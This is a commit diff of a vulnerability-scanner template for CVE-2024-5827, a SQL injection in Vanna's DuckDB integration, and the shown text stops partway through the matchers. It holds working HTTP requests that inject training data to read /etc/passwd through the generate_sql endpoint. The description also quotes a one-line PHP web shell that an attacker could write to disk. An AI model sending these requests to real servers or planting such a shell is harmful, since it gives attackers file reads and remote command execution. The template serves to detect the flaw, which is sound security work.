updated req, info & payload

patch-10
Ritik Chaddha 2024-08-27 06:32:18 +04:00 committed by GitHub
parent eca0361dd2
commit 4b6b428705
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 22 additions and 3 deletions

View File

@ -2,20 +2,39 @@ id: CVE-2024-5827
info:
name: Vanna - SQL injection
author: olfloralo, nukunga, harksu, nechyo, gy741
author: olfloralo,nukunga,harksu,nechyo,gy741
severity: high
description: |
Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `<?php system($_GET[0]); ?>`. This can lead to command execution or the creation of backdoors.
reference:
- https://huntr.com/bounties/a3f913d6-c717-4528-b974-26d8d9e839ca
- https://nvd.nist.gov/vuln/detail/CVE-2024-5827
metadata:
max-request: 2
fofa-query: body='vanna.ai'
tags: cve,cve2024,vanna,sqli
flow: http(1) && http(2)
http:
- raw:
- |
POST /sql HTTP/1.1
POST /api/v0/train HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"sql": "SELECT pg_read_file('/etc/passwd', 0, 1000);"}
{"sql":"SELECT pg_read_file('/etc/passwd', 0, 1000);"}
matchers:
- type: word
words:
- 'id":'
internal: true
- raw:
- |
GET /api/v0/generate_sql?question=What%20is%20the%20content%20of%20the%20first%201000%20characters%20of%20the%20%2Fetc%2Fpasswd%20file? HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers: